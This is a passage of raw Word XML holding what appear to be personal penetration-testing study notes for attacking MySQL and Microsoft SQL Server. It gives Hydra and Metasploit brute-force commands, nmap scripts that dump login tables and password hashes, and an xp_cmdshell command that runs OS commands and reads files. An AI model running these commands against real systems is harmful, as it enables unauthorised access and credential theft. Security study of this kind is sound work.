        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“auxiliary/scanner/mysql/mysql_login”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E2CBA4" w14:textId="10214A01" w:rsidR="00DC352F" w:rsidRPr="002A77BD" w:rsidRDefault="007625EF" w:rsidP="00DC352F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">MySQL </w:t>
      </w:r>
      <w:r w:rsidR="00DC352F" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Login brute force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75ECC327" w14:textId="00F801CE" w:rsidR="00DC352F" w:rsidRPr="002A77BD" w:rsidRDefault="00DC352F" w:rsidP="007625EF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Remember, verbose to false, stop on success to true, and then username + wordlist.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2A8C1D" w14:textId="77777777" w:rsidR="00496C04" w:rsidRPr="002A77BD" w:rsidRDefault="00496C04" w:rsidP="00496C04">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B7379C3" w14:textId="05FED7AA" w:rsidR="007625EF" w:rsidRPr="002A77BD" w:rsidRDefault="007625EF" w:rsidP="00496C04">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>MySQL – Dictionary Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6337F134" w14:textId="3FD97330" w:rsidR="007625EF" w:rsidRPr="002A77BD" w:rsidRDefault="00DC352F" w:rsidP="00DC352F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Hydra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618D1785" w14:textId="62079EBE" w:rsidR="00DC352F" w:rsidRPr="002A77BD" w:rsidRDefault="00DC352F" w:rsidP="00DC352F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>hydra -l (USER) -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt (HOST) mysql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47210B9A" w14:textId="77777777" w:rsidR="00DC352F" w:rsidRPr="002A77BD" w:rsidRDefault="00DC352F" w:rsidP="00DC352F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B640DB6" w14:textId="77777777" w:rsidR="00DC352F" w:rsidRPr="002A77BD" w:rsidRDefault="00DC352F" w:rsidP="00DC352F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CD9DF75" w14:textId="77777777" w:rsidR="00DC352F" w:rsidRPr="002A77BD" w:rsidRDefault="00DC352F" w:rsidP="00DC352F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46D35020" w14:textId="77777777" w:rsidR="00DC352F" w:rsidRPr="002A77BD" w:rsidRDefault="00DC352F" w:rsidP="00DC352F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46C20F9A" w14:textId="4ED33B57" w:rsidR="00496C04" w:rsidRPr="002A77BD" w:rsidRDefault="00DC352F" w:rsidP="00496C04">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Microsoft SQL – MSSQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2934D358" w14:textId="6506509A" w:rsidR="00DC352F" w:rsidRPr="002A77BD" w:rsidRDefault="00DC352F" w:rsidP="00DC352F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Default Port 1433 – ms-sql-s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2281A9AA" w14:textId="7C9825F1" w:rsidR="00D95F10" w:rsidRPr="002A77BD" w:rsidRDefault="00D95F10" w:rsidP="00DC352F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Microsoft version for MySQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A9F664" w14:textId="77777777" w:rsidR="00DC352F" w:rsidRPr="002A77BD" w:rsidRDefault="00DC352F" w:rsidP="00DC352F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12555616" w14:textId="4A170036" w:rsidR="00D95F10" w:rsidRPr="002A77BD" w:rsidRDefault="00D95F10" w:rsidP="00D95F10">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“nmap (HOST) -p 1433 -sV –script ms-sql-info”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BDE78C" w14:textId="77777777" w:rsidR="00D95F10" w:rsidRPr="002A77BD" w:rsidRDefault="00D95F10" w:rsidP="00D95F10">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64FD4654" w14:textId="2524D372" w:rsidR="00D95F10" w:rsidRPr="002A77BD" w:rsidRDefault="00D95F10" w:rsidP="00D95F10">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Enumerate MS SQL basic server or service info.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AB4EDD" w14:textId="77777777" w:rsidR="00D95F10" w:rsidRPr="002A77BD" w:rsidRDefault="00D95F10" w:rsidP="00D95F10">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21732146" w14:textId="5E3A201F" w:rsidR="004A69DC" w:rsidRPr="002A77BD" w:rsidRDefault="00DC352F" w:rsidP="004A69DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“nmap (HOST) -p 1433 –script ms-sql-ntlm-info –script-args mssql.instance.port=1433”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545D7C37" w14:textId="2A2AD3DD" w:rsidR="004A69DC" w:rsidRPr="002A77BD" w:rsidRDefault="004A69DC" w:rsidP="004A69DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Enumerate system, computer, domain name info.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFEA94E" w14:textId="77777777" w:rsidR="004A69DC" w:rsidRPr="002A77BD" w:rsidRDefault="004A69DC" w:rsidP="004A69DC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="734EE80E" w14:textId="1A8827FB" w:rsidR="004A69DC" w:rsidRPr="002A77BD" w:rsidRDefault="004A69DC" w:rsidP="004A69DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“nmap (HOST) -p 1433 –script ms-sql-brute –script-args userdb=(USER WORDLIST PATH),passdb=(PASS WORDLIST PATH)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FE5189" w14:textId="7C3A6DC7" w:rsidR="004A69DC" w:rsidRPr="002A77BD" w:rsidRDefault="004A69DC" w:rsidP="004A69DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>NMAP brute force login script.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51EE1302" w14:textId="77777777" w:rsidR="004A69DC" w:rsidRPr="002A77BD" w:rsidRDefault="004A69DC" w:rsidP="004A69DC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EBCE10F" w14:textId="14902A23" w:rsidR="004A69DC" w:rsidRPr="002A77BD" w:rsidRDefault="004A69DC" w:rsidP="004A69DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“nmap (HOST) -p 1433 –script ms-sql-empty-password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063EFBE3" w14:textId="738E71DC" w:rsidR="004A69DC" w:rsidRPr="002A77BD" w:rsidRDefault="004A69DC" w:rsidP="004A69DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Enumerate users on the MSSQL with an empty password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3DB7F5" w14:textId="77777777" w:rsidR="004A69DC" w:rsidRPr="002A77BD" w:rsidRDefault="004A69DC" w:rsidP="004A69DC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15CA2200" w14:textId="2351ADCA" w:rsidR="004A69DC" w:rsidRPr="002A77BD" w:rsidRDefault="004A69DC" w:rsidP="004A69DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“nmap (HOST) -p 1433 –script ms-sql-query –script-args mssql.username=(USER),mssql.password=(PASS),ms-sql-query.query=”SELECT * FROM master..syslogins” -oN output.txt”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF6F1EE" w14:textId="3E19E38A" w:rsidR="004A69DC" w:rsidRPr="002A77BD" w:rsidRDefault="004A69DC" w:rsidP="004A69DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Output entire database of the records of logins on the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C010BE2" w14:textId="77777777" w:rsidR="004A69DC" w:rsidRPr="002A77BD" w:rsidRDefault="004A69DC" w:rsidP="004A69DC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B40BB5D" w14:textId="680BCFC4" w:rsidR="004A69DC" w:rsidRPr="002A77BD" w:rsidRDefault="004A69DC" w:rsidP="004A69DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“nmap (HOST) -p 1433 –script ms-sql-dump-hashes –script-args mssql.username=(USER),mssql.password=(PASS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D24BDFD" w14:textId="4D3BA288" w:rsidR="004A69DC" w:rsidRPr="002A77BD" w:rsidRDefault="004A69DC" w:rsidP="004A69DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Dump user hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DC8932" w14:textId="77777777" w:rsidR="004A69DC" w:rsidRPr="002A77BD" w:rsidRDefault="004A69DC" w:rsidP="004A69DC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="789DB4F7" w14:textId="0F4C50BD" w:rsidR="004A69DC" w:rsidRPr="002A77BD" w:rsidRDefault="004A69DC" w:rsidP="004A69DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“nmap (HOST) -p 1433 –script ms-sql-xp-cmdshell –script-args mssql.username=(USER),mssql.password=(PASS),ms-sql-xp-cmdshell.cmd=”ip</w:t>
      </w:r>
      <w:r w:rsidR="00D95F10" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> config”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1998D13C" w14:textId="63035F46" w:rsidR="00D95F10" w:rsidRPr="002A77BD" w:rsidRDefault="00D95F10" w:rsidP="00D95F10">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Execute a shell command using SQL, however this command will run an IP config and display device IPs</w:t>
      </w:r>
      <w:r w:rsidR="007159A0" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE93BD0" w14:textId="55A08091" w:rsidR="00D95F10" w:rsidRPr="002A77BD" w:rsidRDefault="00D95F10" w:rsidP="00D95F10">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Could do “type c:\(FILE)” to basically cat or output a file (for Windows)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53662F87" w14:textId="77777777" w:rsidR="00D95F10" w:rsidRPr="002A77BD" w:rsidRDefault="00D95F10" w:rsidP="00D95F10">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="114EC964" w14:textId="77777777" w:rsidR="007159A0" w:rsidRPr="002A77BD" w:rsidRDefault="007159A0" w:rsidP="00D95F10">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AA59B4A" w14:textId="77777777" w:rsidR="007159A0" w:rsidRPr="002A77BD" w:rsidRDefault="007159A0" w:rsidP="00D95F10">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="052CCB2B" w14:textId="77777777" w:rsidR="007159A0" w:rsidRPr="002A77BD" w:rsidRDefault="007159A0" w:rsidP="00D95F10">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44EFA325" w14:textId="7BCED4A2" w:rsidR="00D95F10" w:rsidRPr="002A77BD" w:rsidRDefault="00D95F10" w:rsidP="00D95F10">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:r w:rsidR="007159A0" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> - MSSQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289201CB" w14:textId="7CEDCB9D" w:rsidR="00D95F10" w:rsidRPr="002A77BD" w:rsidRDefault="00D95F10" w:rsidP="00D95F10">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“auxiliary/scanner/mssql/mssql_login”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFBC64E" w14:textId="43B06F98" w:rsidR="00D95F10" w:rsidRPr="002A77BD" w:rsidRDefault="00D95F10" w:rsidP="00D95F10">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Module that will brute force the MSSQL login.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0148BE38" w14:textId="77777777" w:rsidR="007159A0" w:rsidRPr="002A77BD" w:rsidRDefault="007159A0" w:rsidP="007159A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="735EA39F" w14:textId="6653F253" w:rsidR="007159A0" w:rsidRPr="002A77BD" w:rsidRDefault="007159A0" w:rsidP="007159A0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“auxiliary/admin/mssql/mssql_enum”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D99CCB" w14:textId="3592FD12" w:rsidR="007159A0" w:rsidRPr="002A77BD" w:rsidRDefault="007159A0" w:rsidP="007159A0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Enumerate a crap ton of database information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615D4BAE" w14:textId="77777777" w:rsidR="007159A0" w:rsidRPr="002A77BD" w:rsidRDefault="007159A0" w:rsidP="007159A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FFB501F" w14:textId="53419303" w:rsidR="007159A0" w:rsidRPr="002A77BD" w:rsidRDefault="007159A0" w:rsidP="007159A0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“auxiliary/admin/mssql/mssql_enum_sql_logins”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6D1654" w14:textId="15BD041A" w:rsidR="007159A0" w:rsidRPr="002A77BD" w:rsidRDefault="007159A0" w:rsidP="007159A0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Enumerate users that have logged into the SQL server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E28063" w14:textId="77777777" w:rsidR="007159A0" w:rsidRPr="002A77BD" w:rsidRDefault="007159A0" w:rsidP="007159A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
